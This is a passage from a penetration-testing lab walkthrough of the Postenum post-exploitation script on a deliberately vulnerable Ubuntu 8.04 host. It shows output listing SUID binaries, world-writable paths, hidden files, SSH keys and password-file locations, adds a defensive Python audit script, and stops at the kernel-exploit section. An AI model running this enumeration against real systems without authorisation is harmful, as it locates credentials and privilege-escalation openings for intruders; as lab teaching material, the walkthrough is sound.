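        print(f"{f.severity:<4} {f.kind:<30} {f.path}")
```

Feeding it the real -c and -s output instead of the sample gives the same ranked list for the target, with the lines Postenum prints that are not listings (such as the "command not found" error above) skipped automatically.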

Phase 8: Other Files & Sticky Bits

The next option we'll cover will give us SUID and SGID information related to the filesystem. These types of files can often be abused for privilege escalation when misconfigured. It will also check for hidden files and any other useful bits of information — use the -s switch for this:

target:/var/tmp$ ./postenum.sh -s

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] FILE SYSTEM
[+] - Check if anything interesting in the www directory
[x] Any interesting file/folder in /var:
drwxr-xr-x  2 root     root     4.0K May  8  2010 backups
drwxr-xr-x 12 root     root     4.0K Apr 28  2010 cache
drwxr-xr-x 37 root     root     4.0K May 20  2012 lib
drwxrwsr-x  2 root     staff    4.0K Apr 15  2008 local
drwxrwxrwt  3 root     root       60 Jun 19 13:21 lock
drwxr-xr-x 14 root     root     4.0K Jun 19 13:21 log
drwxrwsr-x  2 root     mail     4.0K May  7  2010 mail
drwxr-xr-x  2 root     root     4.0K Mar 16  2010 opt
drwxr-xr-x 14 root     root      580 Jun 19 13:21 run
drwxr-xr-x  5 root     root     4.0K Apr 28  2010 spool
drwxrwxrwt  2 root     root     4.0K Jun 19 13:35 tmp
drwxr-xr-x 10 www-data www-data 4.0K Aug  8  2018 www

[x] Any interesting file/folder in /var/www:
drwxrwxrwt  3 root     root     4.0K Jun 19  2019 dav
drwxr-xr-x  8 www-data www-data 4.0K May 20  2012 dvwa
-rw-r--r--  1 www-data www-data  891 May 20  2012 index.php
drwxr-xr-x 10 www-data www-data 4.0K May 14  2012 mutillidae
drwxr-xr-x 11 www-data www-data 4.0K May 14  2012 phpMyAdmin
-rw-r--r--  1 www-data www-data   19 Apr 16  2010 phpinfo.php
drwxr-xr-x  3 www-data www-data 4.0K May 14  2012 test
drwxrwxr-x 22 www-data www-data  20K Apr 12  2018 tikiwiki
drwxrwxr-x 22 www-data www-data  20K Apr 16  2010 tikiwiki-old
drwxr-xr-x  7 www-data www-data 4.0K Apr 16  2010 twiki

ls: cannot access /var/www/html: No such file or directory

[x] Search on config.* and db.* files on /var:
-rw-r--r-- 1 root root 21424 May 20  2012 /var/cache/debconf/config.dat
-rw-r--r-- 1 root root 21308 May 20  2012 /var/cache/debconf/config.dat-old
-rw-r--r-- 1 www-data www-data 18684 Mar 16  2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 2772 Mar 16  2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/Config/Config.ini
-rw-r--r-- 1 www-data www-data 576 May 20  2012 /var/www/dvwa/config/config.inc.php
-rw-r--r-- 1 www-data www-data 576 Aug 26  2010 /var/www/dvwa/config/config.inc.php~
-rwxr-xr-x 1 www-data www-data 175 Apr  4  2018 /var/www/mutillidae/config.inc
-rwxr-xr-x 1 www-data www-data 20810 Apr 11  2011 /var/www/mutillidae/owasp-esapi-php/lib/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 60881 Dec  9  2008 /var/www/phpMyAdmin/libraries/config.default.php
-rw-r--r-- 1 www-data www-data 4066 Dec  9  2008 /var/www/phpMyAdmin/libraries/auth/config.auth.lib.php
-rw-r--r-- 1 www-data www-data 35105 Dec  9  2008 /var/www/phpMyAdmin/libraries/Config.class.php
-rw-r--r-- 1 www-data www-data 2093 Dec  9  2008 /var/www/phpMyAdmin/config.sample.inc.php
-rw-r--r-- 1 www-data www-data 1584 Dec  9  2008 /var/www/phpMyAdmin/setup/frames/config.inc.php
-rw-r--r-- 1 www-data www-data 2719 Dec  9  2008 /var/www/phpMyAdmin/setup/config.php
-rw-rw-r-- 1 www-data www-data 1770 Aug 26  2004 /var/www/tikiwiki-old/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3449 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12  2005 /var/www/tikiwiki-old/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12  2005 /var/www/tikiwiki-old/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24  2003 /var/www/tikiwiki-old/img/icons/config.gif
-rw-rw-r-- 1 www-data www-data 1770 Aug 26  2004 /var/www/tikiwiki/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 28  2006 /var/www/tikiwiki/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 30  2006 /var/www/tikiwiki/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3259 Jan 28  2004 /var/www/tikiwiki/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12  2005 /var/www/tikiwiki/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12  2005 /var/www/tikiwiki/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24  2003 /var/www/tikiwiki/img/icons/config.gif

[+] - Search for hidden files
[x] Hidden files:
-rw-r--r-- 1 service service 586 Apr 16  2010 /home/service/.profile
-rw-r--r-- 1 service service 2928 Apr 16  2010 /home/service/.bashrc
-rw-r--r-- 1 service service 220 Apr 16  2010 /home/service/.bash_logout
-rw-r--r-- 1 user user 586 Mar 31  2010 /home/user/.profile
-rw------- 1 user user 165 May  7  2010 /home/user/.bash_history
-rw-r--r-- 1 user user 2928 Mar 31  2010 /home/user/.bashrc
-rw-r--r-- 1 user user 220 Mar 31  2010 /home/user/.bash_logout
-rw------- 1 root root 4174 May 14  2012 /home/msfadmin/.mysql_history
-rw-r--r-- 1 msfadmin msfadmin 1598 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/.htaccess.txt
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 1436 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.changes
-rw-r--r-- 1 msfadmin msfadmin 210 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/.htpasswd
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3657 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3489 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 4189 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 683 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 767 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.changes
-rwx------ 1 msfadmin msfadmin 4 May 20  2012 /home/msfadmin/.rhosts
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16  2010 /home/msfadmin/.profile
-rw-r--r-- 1 msfadmin msfadmin 0 May  7  2010 /home/msfadmin/.sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 0 Jun  6  2018 /home/msfadmin/.Xauthority
-rw-rw-rw- 1 root daemon 1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
-rw-rw-rw- 1 root daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
-rw-r--r-- 1 root root 5 Dec  5  2007 /usr/share/python-support/antlr/.version
-rw-r--r-- 1 root root 2 Aug 29  2007 /usr/share/python-support/python-gnupginterface/.version
-rw-r--r-- 1 root root 0 May 20  2012 /usr/lib/firefox-3.6.17/.autoreg
-rw-r--r-- 1 root root 1258 Mar 10  2008 /usr/lib/jvm/.java-gcj.jinfo
-rw------- 1 root root 215 Jun 19 13:46 /root/.mysql_history
-rwx------ 1 root root 4 May 20  2012 /root/.rhosts
-rw-r--r-- 1 root root 141 Oct 20  2007 /root/.profile
-rw-r--r-- 1 root root 173 Jun 19  2019 /root/.bash_history
-rw------- 1 root root 324 Jun 19 13:21 /root/.Xauthority
-rw-r--r-- 1 root root 2227 Oct 20  2007 /root/.bashrc
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.monthly/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 586 Apr 14  2008 /etc/skel/.profile
-rw-r--r-- 1 root root 2928 Apr 14  2008 /etc/skel/.bashrc
-rw-r--r-- 1 root root 220 Apr 14  2008 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.hourly/.placeholder
-rw------- 1 root root 0 Mar 16  2010 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 Jun 19 13:20 /dev/.initramfs-tools
-rw------- 1 postgres postgres 34 Jun 19 13:21 /var/run/postgresql/.s.PGSQL.5432.lock
-rw-r--r-- 1 root root 34 May 13  2012 /var/lib/python-support/python2.5/.path
-rw------- 1 postgres postgres 131 Mar 30  2010 /var/lib/postgresql/.bash_history
-rwxr-xr-x 1 www-data www-data 497 Sep  8  2010 /var/www/dvwa/.htaccess
-rwxr-xr-x 1 www-data www-data 174 Apr 11  2011 /var/www/mutillidae/.buildpath
-rwxr-xr-x 1 www-data www-data 712 Apr 11  2011 /var/www/mutillidae/.project
-rwxr-xr-x 1 www-data www-data 427 May 14  2012 /var/www/mutillidae/.htaccess
-rw-r--r-- 1 www-data www-data 118 Dec  9  2008 /var/www/phpMyAdmin/libraries/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 22  2005 /var/www/tikiwiki-old/modules/cache/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 19  2005 /var/www/tikiwiki-old/templates_c/.htaccess
-rw-r--r-- 1 www-data www-data 1598 Jun  1  2002 /var/www/twiki/bin/.htaccess.txt
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Sandbox/.mailnotify
-rwxrwxrwx 1 www-data www-data 1436 Feb  1  2003 /var/www/twiki/data/Sandbox/.changes
-rw-r--r-- 1 www-data www-data 210 Jan 11  2003 /var/www/twiki/data/.htpasswd
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Main/.mailnotify
-rwxrwxrwx 1 www-data www-data 3653 Apr 16  2010 /var/www/twiki/data/Main/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Know/.mailnotify
-rwxrwxrwx 1 www-data www-data 3489 Jan 30  2003 /var/www/twiki/data/Know/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/TWiki/.mailnotify
-rwxrwxrwx 1 www-data www-data 4189 Feb  1  2003 /var/www/twiki/data/TWiki/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/_default/.mailnotify
-rwxrwxrwx 1 www-data www-data 683 Jan 30  2003 /var/www/twiki/data/_default/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Trash/.mailnotify
-rwxrwxrwx 1 www-data www-data 767 Jan 25  2003 /var/www/twiki/data/Trash/.changes
-rw------- 1 www-data www-data 4275 Jun 19  2019 /var/www/.bash_history
-rw-rw-r-- 1 www-data www-data 66 Jan 22  2005 /var/www/tikiwiki/modules/cache/.htaccess
-rw-rw-r-- 1 www-data www-data 66 Jan 19  2005 /var/www/tikiwiki/templates_c/.htaccess
-r--r--r-- 1 root root 11 Jun 19 13:21 /tmp/.X0-lock

[+] - Check for clear-text password on /home/*
[x] Clear text password:
-rwxr-xr-x 1 msfadmin msfadmin 6936 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/passwd

[+] - The most interesting ssh files /
[x] SSH files:
-rw-r--r-- 1 root root 442 May 20  2012 /root/.ssh/known_hosts
-rw-r--r-- 1 root root 405 May 17  2010 /root/.ssh/authorized_keys

[+] - Check sticky bits, SUID and SGID
[x] SUID - 4000:
-rwsr-xr-x 1 root root 63584 Apr 14  2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26  2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14  2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10  2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10  2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec  2  2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22  2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr  2  2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22  2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr  2  2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr  2  2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr  2  2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22  2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr  2  2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct  4  2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17  2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar  9  2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17  2009 /usr/lib/pt_chown

[x] SGID - 2000:
-rwxr-sr-x 1 root shadow 19584 Apr  9  2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22  2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12  2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr  6  2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar  8  2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr  8  2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr  2  2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23  2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr  2  2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan  2  2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14  2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18  2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18  2008 /usr/sbin/postdrop

[x] Sticky bit for folders - 1000:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxr-t 2 root postgres 4096 May  8  2010 /var/log/postgresql
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19  2019 /var/www/dav
drwxrwx--T 2 daemon daemon 4096 Mar 16  2010 /var/spool/cron/atjobs
drwxrwx--T 2 daemon daemon 4096 Feb 20  2007 /var/spool/cron/atspool
drwx-wx--T 2 root crontab 4096 Apr  8  2008 /var/spool/cron/crontabs
drwx-wx--T 2 postfix postdrop 4096 May  7  2010 /var/spool/postfix/maildrop
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix

[+] - Check for written and executable places
[x] World-writable folders - 222:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19  2019 /var/www/dav
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/data/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr 16  2010 /var/www/twiki/data/Main
drwxrwxrwx 2 www-data www-data 4096 Jan 30  2003 /var/www/twiki/data/Know
drwxrwxrwx 2 www-data www-data 16384 Feb  1  2003 /var/www/twiki/data/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 30  2003 /var/www/twiki/data/_default
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/data/Trash
drwxrwxrwx 2 www-data www-data 4096 Apr 21  2002 /var/www/twiki/pub/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr  7  2002 /var/www/twiki/pub/Main
drwxrwxrwx 3 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/Know
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
drwxrwxrwx 8 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 21  2003 /var/www/twiki/pub/TWiki/TWikiDocGraphics
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/TWikiTemplates
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/TWikiLogos
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/PreviewBackground
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/FileAttachment
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/WabiSabi
drwxrwxrwx 2 www-data www-data 4096 Dec  4  2001 /var/www/twiki/pub/Trash
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/pub/icn
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix

[x] World-writable files - 0002:
304795    4 -rw-rw-rw-   1 root     daemon          1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
304796    4 -rw-rw-rw-   1 root     daemon          1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
 11265    0 srw-rw-rw-   1 root     root            0 Jun 19 13:21 /dev/log
 10037    0 drwxrwxrwt   2 root     root           40 Jun 19 13:21 /dev/shm
  6130    0 crw-rw-rw-   1 root     root              Mar 16  2010 /dev/null
  5082    0 crw-rw-rw-   1 root     tty               Jun 19 13:20 /dev/ttyzf

...

[+] - Check for readable logfiles owned by root
[x] World-readable logfiles - 0004:
-rw-r--r-- 1 root root 88953 Jul  5  2018 /var/log/dpkg.log
-rw-r--r-- 1 root root 5376 Jun 19 13:22 /var/log/wtmp
-rw-r--r-- 1 root root 96 Mar 16  2010 /var/log/installer/lsb-release
-rw-r--r-- 1 root root 0 Mar 16  2010 /var/log/installer/initial-status.gz
-rw-r--r-- 1 root root 58721 Mar 16  2010 /var/log/installer/status
-rw-r--r-- 1 root root 46866 Mar 16  2010 /var/log/installer/hardware-summary
-rw-r--r-- 1 root adm 16950 Jun 19 13:41 /var/log/dmesg.0
-rw-r--r-- 1 root root 292114 Jun 19 13:20 /var/log/udev
-rw-r--r-- 1 root adm 6419 Jun 19 13:52 /var/log/dmesg.4.gz
-rw-r--r-- 1 root adm 6405 Jun 19 13:21 /var/log/dmesg.3.gz
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.crit
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.notice
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.err
-rw-r--r-- 1 root root 0 May 20  2012 /var/log/boot
-rw-r--r-- 1 root adm 6446 Jun 19 13:20 /var/log/dmesg.2.gz
-rw-r--r-- 1 root root 0 May 20  2012 /var/log/btmp
-rw-r--r-- 1 root adm 6414 Jun 19 13:21 /var/log/dmesg.1.gz
-rw-r--r-- 1 root root 292292 Jun 19 13:22 /var/log/lastlog
-rw-r--r-- 1 root adm 16992 Jun 19 13:21 /var/log/dmesg

[+] - List NFS shares and permisisons
[x] NFS:
-rw-r--r-- 1 root root 367 May 13  2012 /etc/exports

It begins by checking for interesting files in the standard web server directories. Next, it looks for hidden files, SSH files, and any clear-text passwords in the home directories. It then checks for SUID, SGID, and sticky bits. After that, it looks for world-writable and executable directories and files, lists world-readable log files owned by root, and finishes with any NFS shares present on the system (here only /etc/exports is shown).
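The permission listings above are the raw material; the judgement calls (is a world-writable directory fine because it has the sticky bit, is this SUID binary expected on the distribution) are left to the reader. The following is an added example, not part of the original article or of Postenum, that parses `ls -l` / `find -ls` style lines such as the ones Postenum prints into numeric mode bits and applies three checks a defender would want when reviewing this kind of output: set-id files not in a known-good baseline, world-writable directories lacking the sticky bit, and world-writable regular files. The sample listing and the baseline set are constructed for the example (a few entries mirror the output above); a real baseline would come from a freshly installed reference system.

```python
import re
import stat
from dataclasses import dataclass
from typing import List, Tuple, FrozenSet

# Constructed sample in the two formats Postenum prints above: plain `ls -l`
# lines and `find -ls` lines with a leading inode and block count.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
-rwxr-sr-x 1 root shadow 19584 Apr  9  2008 /sbin/unix_chkpwd
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwx 2 www-data www-data 4096 Apr 16  2010 /var/www/twiki/data/Main
304795    4 -rw-rw-rw-   1 root     daemon          1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rw-r--r-- 1 root root 405 May 17  2010 /root/.ssh/authorized_keys
crw-rw-rw- 1 root root Mar 16  2010 /dev/null
"""

# Constructed baseline of set-id binaries expected on this build; in practice
# generate it from a clean reference install and keep it under version control.
BASELINE_SETID: FrozenSet[str] = frozenset({"/bin/su", "/sbin/unix_chkpwd"})

# Optional leading "inode blocks" from find -ls, then type, 9 permission chars,
# optional ACL/xattr marker, link count, owner, group, size (absent for devices),
# date in either "Mon DD HH:MM" or "Mon DD  YYYY" form, then the path.
LINE_RE = re.compile(
    r"^(?:\d+\s+\d+\s+)?([-dlcbsp])([rwxsStT-]{9})[.+@]?\s+\d+\s+(\S+)\s+(\S+)\s+(\d*)\s*"
    r"([A-Z][a-z]{2}\s+\d{1,2}\s+(?:\d{2}:\d{2}|\d{4}))\s+(\S.*)$"
)


@dataclass
class Entry:
    ftype: str   # '-' regular file, 'd' directory, 'c' char device, ...
    mode: int    # permission and set-id/sticky bits as an integer
    owner: str
    group: str
    path: str


def mode_from_string(perm: str) -> int:
    """Turn the 9-character rwx field of `ls -l` into numeric mode bits.

    's'/'S' in the owner or group execute slot add setuid/setgid, 't'/'T' in
    the other execute slot adds the sticky bit; lower-case means the execute
    bit is also set, upper-case means it is not.
    """
    if len(perm) != 9:
        raise ValueError(f"bad permission field: {perm!r}")
    bits = (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
            stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
            stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH)
    special = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}
    mode = 0
    for i, ch in enumerate(perm):
        if ch == "-":
            continue
        if ch in "rwx":
            mode |= bits[i]
        elif ch in "sStT" and i in special:
            mode |= special[i]
            if ch in "st":
                mode |= bits[i]
        else:
            raise ValueError(f"unexpected {ch!r} at position {i} in {perm!r}")
    return mode


def parse_listing(text: str) -> List[Entry]:
    """Parse listing lines; headers such as '[x] SUID - 4000:' are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ftype, perm, owner, group, _size, _date, path = m.groups()
        entries.append(Entry(ftype, mode_from_string(perm), owner, group, path))
    return entries


def audit(entries: List[Entry], setid_baseline: FrozenSet[str]) -> List[Tuple[str, str]]:
    """Return (finding, path) pairs for entries that deserve a closer look."""
    findings = []
    for e in entries:
        if e.ftype == "-" and e.mode & (stat.S_ISUID | stat.S_ISGID) and e.path not in setid_baseline:
            findings.append(("setid-not-in-baseline", e.path))
        # Device nodes and sockets such as /dev/null are world-writable by design;
        # they need a separate review, so only files and directories are checked here.
        if not (e.mode & stat.S_IWOTH) or e.ftype not in "-d":
            continue
        if e.ftype == "d":
            if not e.mode & stat.S_ISVTX:   # /tmp-style sticky dirs are expected
                findings.append(("world-writable-dir-no-sticky", e.path))
        else:
            findings.append(("world-writable-file", e.path))
    return findings


if __name__ == "__main__":
    for kind, path in audit(parse_listing(SAMPLE_LISTING), BASELINE_SETID):
        print(f"{kind:28} {path}")
```

Feeding the script the real Postenum output instead of the sample is a matter of pasting the listing into `SAMPLE_LISTING` or reading it from a file; the header lines are ignored by the regex, so the sections can be pasted as-is.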

Phase 9: OS Info & Kernel Exploits

The next option we'll look at will give us information pertaining to the operating system and will suggest any relevant kernel exploits that could potentially be used to escalate privileges and get root. Use the -o switch for this:

target:/var/tmp$ ./postenum.sh -o

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[x] The current user:
www-data

[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[+] - Exploits
